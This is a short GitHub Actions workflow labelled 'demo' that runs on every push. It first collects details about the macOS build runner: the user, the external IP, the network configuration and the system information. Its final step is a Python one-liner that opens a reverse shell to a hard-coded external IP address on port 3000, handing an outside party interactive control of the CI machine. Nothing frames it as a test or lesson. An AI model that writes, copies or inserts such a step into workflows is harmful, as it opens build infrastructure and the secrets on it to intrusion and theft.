name: demo
on: [push]
jobs:
  build:
    runs-on: macos-latest
    steps:
     - run: whoami
     - run: curl ifconfig.co
     - run: ls -laht
     - run: cat /etc/resolv.conf
     - run: uname -a
     - run: ifconfig
     - run: python -c 'import socket,os,pty;s=socket.socket();s.connect(("95.217.236.164",3000));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
